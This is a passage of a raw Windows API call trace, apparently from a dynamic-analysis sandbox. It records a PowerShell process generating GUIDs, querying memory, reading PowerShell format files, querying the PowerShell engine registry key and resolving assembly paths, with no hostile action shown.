	[0430.834] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x244cdcea, Data2=0x7ec3, Data3=0x41e1, Data4=([0]=0x88, [1]=0x51, [2]=0x7a, [3]=0xbf, [4]=0x38, [5]=0x82, [6]=0x9a, [7]=0x49))) returned 0x0
	[0430.834] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x4f679c7e, Data2=0x745e, Data3=0x4e52, Data4=([0]=0xa4, [1]=0x52, [2]=0xc1, [3]=0x26, [4]=0xc3, [5]=0xe9, [6]=0xff, [7]=0xc1))) returned 0x0
	[0430.834] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xe57213f4, Data2=0xf9b5, Data3=0x4f9b, Data4=([0]=0xb2, [1]=0x6, [2]=0xa9, [3]=0xcb, [4]=0x82, [5]=0xae, [6]=0xdb, [7]=0x85))) returned 0x0
	[0430.835] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x83e664c9, Data2=0x9d67, Data3=0x4b49, Data4=([0]=0x9d, [1]=0x85, [2]=0x97, [3]=0xb, [4]=0xbc, [5]=0xa, [6]=0x6f, [7]=0xfe))) returned 0x0
	[0430.835] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x1ae8e1c, Data2=0x98b1, Data3=0x484c, Data4=([0]=0xb9, [1]=0xca, [2]=0x25, [3]=0xab, [4]=0x51, [5]=0x47, [6]=0x70, [7]=0xc4))) returned 0x0
	[0430.835] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x1c62b705, Data2=0x9125, Data3=0x4793, Data4=([0]=0x80, [1]=0x6f, [2]=0x5c, [3]=0xb4, [4]=0xfd, [5]=0x9f, [6]=0x24, [7]=0x7d))) returned 0x0
	[0430.835] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.835] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.835] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.835] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xf4ed210e, Data2=0xcbd1, Data3=0x4a7f, Data4=([0]=0xa7, [1]=0x3, [2]=0xbb, [3]=0x0, [4]=0xc9, [5]=0x6e, [6]=0xc1, [7]=0x96))) returned 0x0
	[0430.836] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xc0843b8a, Data2=0xfdf2, Data3=0x4a44, Data4=([0]=0x81, [1]=0x40, [2]=0xd7, [3]=0x86, [4]=0xfc, [5]=0x8b, [6]=0x16, [7]=0x28))) returned 0x0
	[0430.836] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x82c80511, Data2=0xd7bf, Data3=0x4418, Data4=([0]=0xbf, [1]=0xf9, [2]=0xab, [3]=0x6b, [4]=0x1d, [5]=0xe8, [6]=0xa9, [7]=0x7f))) returned 0x0
	[0430.836] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x4262f676, Data2=0x972b, Data3=0x437e, Data4=([0]=0x8b, [1]=0x62, [2]=0x45, [3]=0xf8, [4]=0x79, [5]=0xe0, [6]=0xef, [7]=0xed))) returned 0x0
	[0430.836] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x4370f77, Data2=0x34b0, Data3=0x4f9c, Data4=([0]=0xba, [1]=0x24, [2]=0x8f, [3]=0x27, [4]=0x28, [5]=0x4f, [6]=0x2b, [7]=0x97))) returned 0x0
	[0430.836] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x6a9b0e20, Data2=0x5726, Data3=0x4a71, Data4=([0]=0xad, [1]=0x14, [2]=0x22, [3]=0x20, [4]=0x45, [5]=0x2, [6]=0xe5, [7]=0xcb))) returned 0x0
	[0430.836] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xf1012969, Data2=0x6598, Data3=0x4ba4, Data4=([0]=0x89, [1]=0x3b, [2]=0x1f, [3]=0xb5, [4]=0x2f, [5]=0xb0, [6]=0x36, [7]=0xb9))) returned 0x0
	[0430.836] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x41584ae8, Data2=0xc4df, Data3=0x4c0e, Data4=([0]=0x90, [1]=0x97, [2]=0xc9, [3]=0xe8, [4]=0x6a, [5]=0x4f, [6]=0x75, [7]=0x7a))) returned 0x0
	[0430.836] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xff3d6b37, Data2=0xc67b, Data3=0x4b08, Data4=([0]=0xa0, [1]=0xed, [2]=0xc2, [3]=0x3, [4]=0x9c, [5]=0x11, [6]=0x9b, [7]=0xf7))) returned 0x0
	[0430.837] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xcf72382c, Data2=0x9071, Data3=0x4207, Data4=([0]=0x96, [1]=0x1f, [2]=0xc1, [3]=0x38, [4]=0xd, [5]=0xcc, [6]=0x97, [7]=0xaa))) returned 0x0
	[0430.837] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x72f89e2e, Data2=0xa9af, Data3=0x45f5, Data4=([0]=0xa3, [1]=0x18, [2]=0x2c, [3]=0xc3, [4]=0xaf, [5]=0x7, [6]=0x87, [7]=0x4e))) returned 0x0
	[0430.837] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x7107a3ac, Data2=0x8b10, Data3=0x4e7c, Data4=([0]=0x95, [1]=0xa1, [2]=0x69, [3]=0x9c, [4]=0x7a, [5]=0x49, [6]=0x7f, [7]=0xb6))) returned 0x0
	[0430.837] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x83440e00, Data2=0xa4e1, Data3=0x4afc, Data4=([0]=0x92, [1]=0xef, [2]=0x9e, [3]=0xde, [4]=0x3f, [5]=0xf, [6]=0x5f, [7]=0xec))) returned 0x0
	[0430.837] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.837] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x96a7a9ea, Data2=0xcd6, Data3=0x43fc, Data4=([0]=0x81, [1]=0xfe, [2]=0x25, [3]=0x62, [4]=0xde, [5]=0x3c, [6]=0x33, [7]=0x53))) returned 0x0
	[0430.837] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.838] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.839] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xd5874f5d, Data2=0xe3d3, Data3=0x4115, Data4=([0]=0x92, [1]=0x25, [2]=0x33, [3]=0xaf, [4]=0xd0, [5]=0xf5, [6]=0x55, [7]=0xa4))) returned 0x0
	[0430.839] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.839] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xd0794d24, Data2=0x4ce5, Data3=0x4963, Data4=([0]=0x9d, [1]=0xe8, [2]=0xd8, [3]=0x16, [4]=0x6e, [5]=0x99, [6]=0xe4, [7]=0xbd))) returned 0x0
	[0430.840] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xb2dc38c5, Data2=0x363a, Data3=0x46ad, Data4=([0]=0x93, [1]=0xce, [2]=0xcd, [3]=0x35, [4]=0x3c, [5]=0x7a, [6]=0x72, [7]=0x5c))) returned 0x0
	[0430.840] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x71197dd6, Data2=0xbbd, Data3=0x4742, Data4=([0]=0xb3, [1]=0x11, [2]=0xd2, [3]=0xa7, [4]=0x8c, [5]=0xb4, [6]=0x3f, [7]=0x66))) returned 0x0
	[0430.840] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x4ebc1ba3, Data2=0xb933, Data3=0x4440, Data4=([0]=0x8a, [1]=0x10, [2]=0x9a, [3]=0xd6, [4]=0x44, [5]=0xff, [6]=0xc6, [7]=0x6))) returned 0x0
	[0430.840] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x94bbac61, Data2=0xf71f, Data3=0x4d7a, Data4=([0]=0x95, [1]=0xb1, [2]=0xe9, [3]=0x5d, [4]=0xec, [5]=0xa4, [6]=0x96, [7]=0x3c))) returned 0x0
	[0430.840] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xd29ee6f7, Data2=0xb7cc, Data3=0x4803, Data4=([0]=0xab, [1]=0xcf, [2]=0x64, [3]=0x9f, [4]=0xd5, [5]=0x56, [6]=0x7, [7]=0x63))) returned 0x0
	[0430.840] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x5bd94991, Data2=0x64d, Data3=0x455f, Data4=([0]=0x98, [1]=0xdf, [2]=0x15, [3]=0xf3, [4]=0x8b, [5]=0xf6, [6]=0x53, [7]=0x3a))) returned 0x0
	[0430.840] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.841] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x4c4009bb, Data2=0x6359, Data3=0x4e2d, Data4=([0]=0x99, [1]=0xe5, [2]=0x42, [3]=0xaa, [4]=0xb, [5]=0x3e, [6]=0xdb, [7]=0x37))) returned 0x0
	[0430.841] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xbb25dfce, Data2=0x310b, Data3=0x4038, Data4=([0]=0xbf, [1]=0xff, [2]=0xc3, [3]=0x21, [4]=0xd5, [5]=0xd6, [6]=0xd6, [7]=0x76))) returned 0x0
	[0430.841] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x1c306b07, Data2=0xdf6d, Data3=0x4052, Data4=([0]=0xaf, [1]=0x30, [2]=0x97, [3]=0x9f, [4]=0x2, [5]=0x8a, [6]=0x95, [7]=0x12))) returned 0x0
	[0430.841] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x7b07c017, Data2=0x6f0c, Data3=0x44ab, Data4=([0]=0x99, [1]=0xdd, [2]=0xef, [3]=0x5d, [4]=0xaf, [5]=0xee, [6]=0x9b, [7]=0x41))) returned 0x0
	[0430.841] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x281e9bba, Data2=0x9792, Data3=0x4b69, Data4=([0]=0xb0, [1]=0xdd, [2]=0x8e, [3]=0x69, [4]=0x81, [5]=0x6f, [6]=0xef, [7]=0xc8))) returned 0x0
	[0430.841] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.841] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xfba4bdfe, Data2=0xa581, Data3=0x4341, Data4=([0]=0x8b, [1]=0x8b, [2]=0x47, [3]=0xa7, [4]=0x48, [5]=0x37, [6]=0x40, [7]=0xf0))) returned 0x0
	[0430.842] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x287f043f, Data2=0x6208, Data3=0x4a5d, Data4=([0]=0x99, [1]=0x3d, [2]=0x97, [3]=0x87, [4]=0xa7, [5]=0xe4, [6]=0xec, [7]=0x4e))) returned 0x0
	[0430.842] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.842] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.842] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.842] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.842] SetErrorMode (uMode=0x1) returned 0x1
	[0430.842] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0430.843] GetFileType (hFile=0x2f4) returned 0x1
	[0430.843] SetErrorMode (uMode=0x1) returned 0x1
	[0430.843] GetFileType (hFile=0x2f4) returned 0x1
	[0430.843] ReadFile (in: hFile=0x2f4, lpBuffer=0x3c2e5c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3c2e5c0*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.843] ReadFile (in: hFile=0x2f4, lpBuffer=0x3c2e5c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3c2e5c0*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.843] ReadFile (in: hFile=0x2f4, lpBuffer=0x3c2e5c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3c2e5c0*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.843] ReadFile (in: hFile=0x2f4, lpBuffer=0x3c2e5c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3c2e5c0*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.844] ReadFile (in: hFile=0x2f4, lpBuffer=0x3c2e5c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3c2e5c0*, lpNumberOfBytesRead=0x24cf98*=0x8b4, lpOverlapped=0x0) returned 1
	[0430.844] ReadFile (in: hFile=0x2f4, lpBuffer=0x3c2d9dc, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3c2d9dc*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.844] ReadFile (in: hFile=0x2f4, lpBuffer=0x3c2e5c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3c2e5c0*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.844] SetErrorMode (uMode=0x1) returned 0x1
	[0430.844] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cf40 | out: lpFileInformation=0x24cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0430.844] SetErrorMode (uMode=0x1) returned 0x1
	[0430.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0430.844] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d028 | out: phkResult=0x24d028*=0x2f4) returned 0x0
	[0430.844] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfac, lpData=0x0, lpcbData=0x24cfa8*=0x0 | out: lpType=0x24cfac*=0x1, lpData=0x0, lpcbData=0x24cfa8*=0x56) returned 0x0
	[0430.844] CoTaskMemAlloc (cb=0x5a) returned 0x48e830
	[0430.844] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cf7c, lpData=0x48e830, lpcbData=0x24cf78*=0x56 | out: lpType=0x24cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cf78*=0x56) returned 0x0
	[0430.845] CoTaskMemFree (pv=0x48e830) 
	[0430.845] RegCloseKey (hKey=0x2f4) returned 0x0
	[0430.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0430.845] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xb2e6b576, Data2=0x4d61, Data3=0x4633, Data4=([0]=0xa5, [1]=0x32, [2]=0xd4, [3]=0xc9, [4]=0x30, [5]=0x9, [6]=0xe0, [7]=0x18))) returned 0x0
	[0430.845] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x44beaf5f, Data2=0xdf94, Data3=0x4a0a, Data4=([0]=0xbf, [1]=0xe8, [2]=0xfb, [3]=0x24, [4]=0xc3, [5]=0xf2, [6]=0x66, [7]=0x2a))) returned 0x0
	[0430.845] SetErrorMode (uMode=0x1) returned 0x1
	[0430.846] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0430.846] GetFileType (hFile=0x2f4) returned 0x1
	[0430.846] SetErrorMode (uMode=0x1) returned 0x1
	[0430.846] GetFileType (hFile=0x2f4) returned 0x1
	[0430.846] ReadFile (in: hFile=0x2f4, lpBuffer=0x3c6c3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3c6c3a8*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.846] ReadFile (in: hFile=0x2f4, lpBuffer=0x3c6c3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3c6c3a8*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.846] ReadFile (in: hFile=0x2f4, lpBuffer=0x3c6c3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3c6c3a8*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.846] ReadFile (in: hFile=0x2f4, lpBuffer=0x3c6c3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3c6c3a8*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.847] ReadFile (in: hFile=0x2f4, lpBuffer=0x3c6c3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3c6c3a8*, lpNumberOfBytesRead=0x24cf98*=0xe98, lpOverlapped=0x0) returned 1
	[0430.847] ReadFile (in: hFile=0x2f4, lpBuffer=0x3c6b9a8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3c6b9a8*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.847] ReadFile (in: hFile=0x2f4, lpBuffer=0x3c6c3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3c6c3a8*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.847] SetErrorMode (uMode=0x1) returned 0x1
	[0430.847] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cf40 | out: lpFileInformation=0x24cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0430.847] SetErrorMode (uMode=0x1) returned 0x1
	[0430.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0430.847] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d028 | out: phkResult=0x24d028*=0x2f4) returned 0x0
	[0430.847] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfac, lpData=0x0, lpcbData=0x24cfa8*=0x0 | out: lpType=0x24cfac*=0x1, lpData=0x0, lpcbData=0x24cfa8*=0x56) returned 0x0
	[0430.848] CoTaskMemAlloc (cb=0x5a) returned 0x48e830
	[0430.848] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cf7c, lpData=0x48e830, lpcbData=0x24cf78*=0x56 | out: lpType=0x24cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cf78*=0x56) returned 0x0
	[0430.848] CoTaskMemFree (pv=0x48e830) 
	[0430.848] RegCloseKey (hKey=0x2f4) returned 0x0
	[0430.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0430.848] VirtualQuery (in: lpAddress=0x24bac0, lpBuffer=0x24c980, dwLength=0x30 | out: lpBuffer=0x24c980*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.848] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xe209f2a, Data2=0x17aa, Data3=0x4ce7, Data4=([0]=0x85, [1]=0x5a, [2]=0x4b, [3]=0xb2, [4]=0xea, [5]=0x6, [6]=0xbc, [7]=0xb7))) returned 0x0
	[0430.849] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x66197e32, Data2=0xf205, Data3=0x4610, Data4=([0]=0x85, [1]=0x25, [2]=0x26, [3]=0xe0, [4]=0x3e, [5]=0x67, [6]=0xc5, [7]=0x65))) returned 0x0
	[0430.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0430.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0431.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
